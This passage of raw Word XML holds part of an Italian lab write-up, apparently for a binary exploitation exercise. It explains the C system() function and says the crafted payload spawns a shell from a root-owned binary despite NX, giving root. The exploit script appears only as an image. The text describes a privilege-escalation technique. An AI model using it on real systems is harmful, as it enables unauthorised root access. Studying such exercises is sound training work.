      </w:r>
      <w:r w:rsidRPr="00D9656F">
        <w:t>1bd0d5 /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78631373" w14:textId="1A4C5473" w:rsidR="00D9656F" w:rsidRDefault="00CC100E" w:rsidP="00AF5671">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Quindi aprendo il file exploit.py vediamo:</w:t>
      </w:r>
      <w:r w:rsidR="00BD3AE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD3AE2">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472B60A4" wp14:editId="2FB77545">
            <wp:extent cx="4010025" cy="3692156"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="12963188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18845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006" cy="37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CD2B" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>La funzione </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>) in Linux (e in generale nei sistemi Unix-like) è una funzione della libreria standard C che permette di </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>eseguire un comando esterno da un programma</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>. In pratica, la funzione </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>) prende una stringa che rappresenta un comando, lo passa alla shell del sistema (solitamente /bin/sh), e la shell lo esegue come se lo avessi digitato direttamente nel terminale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257E307" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Come funziona </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD7FDA" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Riceve una stringa</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: La funzione </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>) accetta come unico argomento una stringa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>const</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t> che rappresenta il comando da eseguire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E8EDD" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoca la shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: Internamente, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>) crea un nuovo processo tramite la chiamata di sistema </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>fork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>() e poi usa una delle funzioni </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>...() per lanciare un'istanza della shell, come /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>sh.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="488B5E65" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Esegue il comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: La shell esegue il comando specificato nella stringa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t xml:space="preserve">. Questo comando può essere qualsiasi comando valido per la shell, inclusi i comandi interni alla shell, comandi esterni, pipeline, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>redirection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>, ecc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B125AE" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Attende la fine del comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>) si blocca e attende che il comando esterno termini la sua esecuzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF47A6" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Restituisce il codice di uscita</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: Una volta che il comando esterno è terminato, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>) restituisce il codice di uscita del comando. Questo codice di uscita indica se il comando è stato eseguito correttamente o se ci sono stati errori. Un codice di uscita 0 indica successo, mentre un valore diverso da 0 indica un errore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5DAA2" w14:textId="5BFFF974" w:rsidR="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00AF5671">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Essenzialmente tramite il payload che abbiamo creato chiamiamo la shell /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nel file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>della root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per il quale non abbiamo i permessi di esecuzione (NX </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) e tramite la funzione system eseguiamo il codice come fossimo root (infatti chiedendo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, risponderà root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057787BA" w14:textId="77777777" w:rsidR="00D9656F" w:rsidRPr="00D9656F" w:rsidRDefault="00D9656F" w:rsidP="00AF5671"/>
    <w:p w14:paraId="72B67160" w14:textId="77777777" w:rsidR="004F7F3F" w:rsidRPr="00D9656F" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671"/>
    <w:p w14:paraId="4E0B09DF" w14:textId="77777777" w:rsidR="001D00EC" w:rsidRPr="00D9656F" w:rsidRDefault="001D00EC" w:rsidP="00AF5671"/>
    <w:p w14:paraId="1FF32CB6" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRPr="00D9656F" w:rsidRDefault="00AF5671" w:rsidP="00AF5671"/>
    <w:sectPr w:rsidR="00AF5671" w:rsidRPr="00D965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728C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5578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1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0D"/>
    <w:rsid w:val="000535FE"/>
    <w:rsid w:val="00060B34"/>
    <w:rsid w:val="001849B8"/>
    <w:rsid w:val="001D00EC"/>
    <w:rsid w:val="004214B5"/>
    <w:rsid w:val="004D02F0"/>
    <w:rsid w:val="004F7F3F"/>
    <w:rsid w:val="005D4A9F"/>
    <w:rsid w:val="00604771"/>
    <w:rsid w:val="0070510D"/>
    <w:rsid w:val="008B240B"/>
    <w:rsid w:val="008D38E2"/>
    <w:rsid w:val="009178A9"/>
    <w:rsid w:val="009D6CE9"/>
    <w:rsid w:val="00AA0ADB"/>
    <w:rsid w:val="00AF5671"/>
    <w:rsid w:val="00BD3AE2"/>
    <w:rsid w:val="00C65D3F"/>
    <w:rsid w:val="00CA3F0C"/>
    <w:rsid w:val="00CC100E"/>
    <w:rsid w:val="00D53D7D"/>
    <w:rsid w:val="00D544D6"/>
    <w:rsid w:val="00D9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FBC3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DCA3ABF2-8D79-4B00-9419-113DDAE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scadia Code" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
        <w:bCs/>
        <w:kern w:val="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8E2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008D3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F476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15608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15608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38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156082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D38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38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38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38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38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8E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="0F476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38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="15608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8E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082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38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082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38E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38E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3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38E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3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8D38E2"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082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38E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D38E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38E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38E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D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E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D38E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D38E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38E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38E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 w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="15608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38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasidelicata">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E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8D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentodelicato">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="E9713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8D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:smallCaps/>
      <w:color w:val="E9713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D38E2"/>
    <w:rPr>
      <w:b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38E2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214B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zut2Mjgh5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81AE-90F6-4AD8-A3CC-BA030B6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ORENZO MURFUNI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>GIOVANNI LORENZO MURFUNI</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2025-01-10T17:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-10T10:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-10T18:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>